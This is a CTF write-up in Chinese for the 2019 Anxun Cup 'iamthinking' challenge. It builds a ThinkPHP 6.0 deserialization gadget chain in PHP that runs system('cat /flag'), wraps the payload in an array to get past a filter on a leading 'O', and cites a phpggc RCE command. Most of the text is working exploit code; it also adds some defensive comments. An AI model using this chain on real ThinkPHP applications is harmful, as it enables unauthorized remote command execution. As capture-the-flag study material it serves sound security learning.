[安洵杯 2019]iamthinking


dirsearch搜集到www.zip文件:

发现是thinkphp6.0版本:

thinkphp6.0有两个比较明显的漏洞:
一个文件上传:要开启session(本题没开)

一个就是反序列化:本题有个unserialize函数

那就是反序列化了

php脚本:

<?php

namespace think\model\concern;

trait Attribute
{
// Stand-in for the framework trait of the same name: only the three
// properties the chain needs are declared. Assumes the names and
// visibilities match ThinkPHP 6.0's think\model\concern\Attribute so the
// serialized object is accepted by the target's autoloaded classes — confirm
// against the framework source (see the linked analysis).
// Declaration order and visibility are both encoded in serialize() output;
// do not reorder or re-scope these.
// $data: the attribute value the chain hands to the callable (here the
// command string from the writeup).
private $data = ["key" => ["key1" => "cat /flag"]];
// $withAttr: presumably the per-attribute callable the framework applies to
// the matching $data entry — not verifiable from this script alone.
private $withAttr = ["key"=>["key1"=>"system"]];
// $json: presumably marks "key" as a JSON-typed attribute; the nested "key1"
// entries of $data and $withAttr line up under it.
protected $json = ["key"];
}
namespace think;

abstract class Model
{
// Stand-in for think\Model. Every declared property below ends up in the
// serialized string in declaration order with its visibility encoded, so
// the layout here must not be reordered or re-scoped.
use model\concern\Attribute;
private $lazySave;
protected $withEvent;
private $exists;
private $force;
protected $table;
protected $jsonAssoc;
// Sets the flag values the chain relies on. $obj is stored in $table, which
// is how one Pivot gets nested inside another at the bottom of the script.
// Why these particular flags matter is framework-internal (presumably the
// destructor / deferred-save path) — not verifiable here; see the linked
// analysis.
function __construct($obj = '')
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->force = true;
$this->table = $obj; // inner object (or '' for the innermost one)
$this->jsonAssoc = true;
}
}

namespace think\model;

use think\Model;

// Concrete subclass standing in for think\model\Pivot. Model above is
// abstract, so this is the class that is actually instantiated and whose
// name appears in the serialized string.
class Pivot extends Model
{
}
// The outer Pivot carries the inner one in its $table property (see the
// Model constructor); the pair is then wrapped in a plain array so the
// serialized string starts with "a:" rather than "O:" — the writeup notes
// the target rejects input whose first character is O.
// Defender's view: an application is only exposed to this if it passes
// request data to unserialize(). json_decode(), or
// unserialize($s, ['allowed_classes' => false]), removes the sink; request
// logs/WAF rules can key on the (urlencoded) "a:1:{i:0;O:" prefix.
$inner = new Pivot();
$outer = new Pivot($inner);
$wrapped = [$outer];
echo urlencode(serialize($wrapped));

phpggc好像搞不了(首字母不能是O,在

./phpggc -u ThinkPHP/RCE2 'system("cat /flag");'

出来的时候是O开头)

仔细的反序列化过程:https://xz.aliyun.com/t/6479?u_atoken=e1983cca7115bb73dc8261395f38e428&u_asig=1a0c399a17270782535993477e0035